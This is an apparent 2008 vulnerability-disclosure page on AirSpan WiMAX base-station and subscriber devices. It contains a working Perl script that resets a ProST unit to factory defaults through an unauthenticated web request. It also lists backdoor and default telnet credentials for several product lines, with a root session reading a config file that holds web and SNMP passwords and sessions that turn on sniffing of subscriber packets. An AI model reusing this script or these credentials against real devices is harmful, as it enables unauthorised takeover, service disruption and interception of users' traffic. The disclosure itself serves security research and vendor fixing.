vulnerabilities reports
-
ProST web access authentication bypass ( publication date 8.03.2008)
-
A remote, unauthenticated attacker may be able to gain access to a vulnerable device and make arbitrary changes to its configuration.
-
#!/usr/bin/perl -w
-
########################################
# #
# US-CERT VU#248372, example #
# by Arthur Lashin diriger@gmail.com #
# #
######################################## -
use strict;
use LWP::UserAgent; -
unless(defined$ARGV[0]) {
die "\nUsage: $0 prost_ip\n\n";
} -
my $ip = $ARGV[0];
-
&prost_reset_to_default($ip);
-
sub prost_reset_to_default {
my $ip = shift;
my $timeout = 20; -
my $html_body = undef;
-
my $ua = LWP::UserAgent->new;
$ua->timeout($timeout);
my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);
if($response->is_success) {
$html_body = $response->content;
print $html_body;
} else {
print "Connect to $ip failed: " . $response->status_line . "\n";
} -
return $html_body;
} -
Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z
-
Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)
-
AirSpan BSDU has a serious security hole, which allows anyone to get remote access to device with root privileges using undocumented telnet access that is on by default. This is possible because all BSDUs share the same root password:
-
[root@diriger]# telnet 192.168.1.254< xml="true" ns="urn:schemas-microsoft-com:office:office" prefix="o" namespace="">
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
bsdu-wimax login: root
-
-
~ # uname -ar
-
Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown
-
~ #
~ # cd /root/shared/system
/root/shared/system # ls -lF
-rw-r--r-- 1 root root 4 Feb 26 08:17 activeBank
-rw-r--r-- 1 root root 256 Feb 26 08:15 bank1metadata
-rw-r--r-- 1 root root 27073 Feb 26 08:18 bank1verification
-rw-r--r-- 1 root root 256 Sep 5 2007 bank2metadata
-rw-r--r-- 1 root root 27073 Sep 6 2007 bank2verification
-rw-r--r-- 1 root root 223 Mar 11 14:51 cfgsh.conf
/root/shared/system #
/root/shared/system # cat ./cfgsh.conf
# WiMAX BSDU Configuration Shell config file
ifconf static
ip 192.168.1.254
nmask 255.255.255.0
gw 192.168.1.1
ns 10.0.0.1
sntps 10.0.0.2
httplp < xml="true" ns="urn:schemas-microsoft-com:office:smarttags" prefix="st1" namespace="">admin,k5Rw2SDcTi
snmproc w3E56G_0&
snmprwc kY^$ds_*
mvlan 15
Here “k5Rw2SDcTi” is web access password. One can edit file ./cfgsh.conf and reboot device to apply new settings.
- ProST telnet access - asmax:airspanmax
Example:
VxWorks login: asmax
Password: airspanmax-> memShow
status bytes blocks avg block max block
------ ---------- --------- ---------- ----------
current
free 217876 56 3890 215928
alloc 2611780 1807 1445 -
cumulative
alloc 536676740 4823368 111 -
value = 0 = 0x0
-> plogStat
Plog status ( mask set 0x00000000,0x00000000 ) :
< 0> ERROR [Off]
< 1> WARN [Off]
< 2> INFO [Off]
< 3> CS [Off]
< 4> ARM0_APPL_TASK [Off]
< 5> CNFG [Off]
< 6> ExecLoop [Off]
< 7> MPA [Off]
< 8> MPDU [Off]
< 9> BRST [Off]
<10> Framing (maps) [Off]
<11> DCD & UCD [Off]
<12> Connection [Off]
<13> Network Entry [Off]
<14> Ranging [Off]
<15> SBC [Off]
<16> Link Maintenance [Off]
<17> Contention [Off]
<18> Link Manager [Off]
<19> LED ctrl [Off]
<20> Channel Reports [Off]
<21> IP Connectivity [Off]
<22> Registration [Off]
<23> Tx Scedular [Off]
<24> Management Msg [Off]
<25> MRCM [Off]
<26> PKM [Off]
<27> CRC & HCS Error [Off]
<28> RSSI & SNR [Off]
<29> BW Req & UL Alloc [Off]
<30> LED_PLUG [Off]
<31> DL Sync [Off]
<32> ARQ [Off]
<33> ARQ RX [Off]
<34> ARQ TX [Off]
<35> WIFI Keep Alive [Off]
<36> DFS [Off]
<37> FLASH [Off]
<38> RF Drivers [Off]
<39> WEB [Off]
<40> MIB [Off]
<41> Home BS [Off]
<42> Misc [Off]
value = 43 = 0x2b = '+'
-> plogOn 28
value = 0 = 0x0462053292 A1[\mrcm.c,716]FCH 15792087: RSSI -155[dBm/10] (-660 at ant), SNR 312[dB/10], TimeOff 0[Smpl], FreqOff -674[Hz]
462053302 A1[\mrcm.c,716]FCH 15792088: RSSI -155[dBm/10] (-660 at ant), SNR 311[dB/10], TimeOff 0[Smpl], FreqOff -709[Hz]
462053312 A1[\mrcm.c,716]FCH 15792089: RSSI -155[dBm/10] (-660 at ant), SNR 322[dB/10], TimeOff 0[Smpl], FreqOff -715[Hz]
462053322 A1[\mrcm.c,716]FCH 15792090: RSSI -155[dBm/10] (-660 at ant), SNR 317[dB/10], TimeOff 0[Smpl], FreqOff -1067[Hz]
-> plogOff 28
value = 0 = 0x0/* tcpdump like commands, parameter = packet number */
-> sniffFromAir 5
... skipped ...
-> sniffFromEth 10
... skipped ...-> NVM_ef_Set2Default ### use this command to reset ProST to default ###
- MicroMAX BSR telnet access - Admin:airspansoc
Example:
VxWorks login: Admin
Password: airspansoc
-> cmd "Start"
value = 0 = 0x0
-> tShell task deleted
No entry for terminal type "dumb";
using dumb terminal settings.
bs>: help
... skipped ...
bs>: VLAN::showGlobalConfiguration
Global Vlan Bridge Information
==============================
Bridge Mode
Bridge Mode : Vlan Bridge
Reserved Vlans
Reserved Vlan (1) : 4090
Reserved Vlan (2) : 4091
Reserved Vlan (3) : 4092
Management Vlan
Management Vlan : 160
Q-in-Q Configuration
Q-in-Q mode : disabled
S-Tag Ether Type : 0x9100
S-Tag Pvid : 0
S-Tag Priority : 0
S-Tag config mode : by SS
S-Tag use priority from : C-Tag(inner)
bs>: showsniffer
SNIFFER
=======
state : disabled
no rules
bs>: createsnifferfilter direction=rx mac-filter=+112233445566 type=mac
bs>: createsnifferfilter direction=rx type=data
bs>: showsniffer
SNIFFER
=======
state : disabled
RULE id=14
rx sniffed : YES
tx sniffed : NO
data sniffed : YES
error type : ONLY VALID
mac sniffed : NO
bs>: enablesniffer
Packet sniffing enabled
INFO
point : RTM
date : 1528.350 s -
PACKET DESCRIPTOR
Descriptor address : 0x0e808344
Actions : 0x00000000
DL pointer : 0x0ca2a420
Rx errors : 0x00000000
Encryption : no
KSN : 0
Packet type : 0x00000046
Raw : no
Wimax : yes
Ethernet : Basic Dix
VLAN : no
IP : IP v4
L4 : no
BWR / GSH value : 0
PHSi : No
CID : 0x00000202
Length : 60
Stuffing : 0
Burst/Stat number : 162
Mac message type : 0x00000000
802.16 infos : 0x00000010
Dest Address : 0x00000015622ef3f0
Dest Hash : 0x00001238
Src Address : 0x000000a00ac49b32
Src Hash : 0x00009c62
Ip header address : 0x0cfd45dc
Valid bit (not accurate) : Sw
DATA LINK
Link address : 0x0e808384
Next link : 0x00000000
Buffer @ : 0x0cfd45c0
Type : 128
Offset : 14
Payload len : 60
Buffer len : 1610
Payload address : 0x0cfd45c0
PAYLOAD
F3 F0 00 A0 0A C4 9B 32 81 00 00 10 08 00 45 00
00 20 00 F0 00 00 40 01 2C 6E C0 A8 81 D5 0A 01
01 01 00 00 D3 03 C4 07 13 56 7D AD D7 F0 00 00
00 00 00 00 00 00 00 00 00 00 00 00
INFO
point : RTM
date : 1531.130 s -
PACKET DESCRIPTOR
Descriptor address : 0x0e8089b8
Actions : 0x00000000
DL pointer : 0x0ca2a420
Rx errors : 0x00000000
Encryption : no
KSN : 0
Packet type : 0x00000026
Raw : no
Wimax : yes
Ethernet : Basic Dix
VLAN : yes
IP : No
L4 : no
BWR / GSH value : 0
PHSi : No
CID : 0x00000204
Length : 64
Stuffing : 0
Burst/Stat number : 210
Mac message type : 0x00000000
802.16 infos : 0x00000010
Dest Address : 0x00000015622ef3f0
Dest Hash : 0x00001238
Src Address : 0x000000235e216f3a
Src Hash : 0x00009701
Ip header address : 0x00000000
Valid bit (not accurate) : Sw
DATA LINK
Link address : 0x0e8089f8
Next link : 0x00000000
Buffer @ : 0x0d001740
Type : 128
Offset : 14
Payload len : 64
Buffer len : 1610
Payload address : 0x0d001740
PAYLOAD
00 15 62 2E F3 F0 00 23 5E 21 6F 3A 81 00 00 1F
08 06 00 01 08 00 06 04 00 02 00 23 5E 21 6F 3A
0A 1E 03 86 00 15 62 2E F3 F0 0A 1E 03 85 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
disablesniffer
Packet sniffing disabled
- MaxroMAX BSR telnet access - root:asmaxroot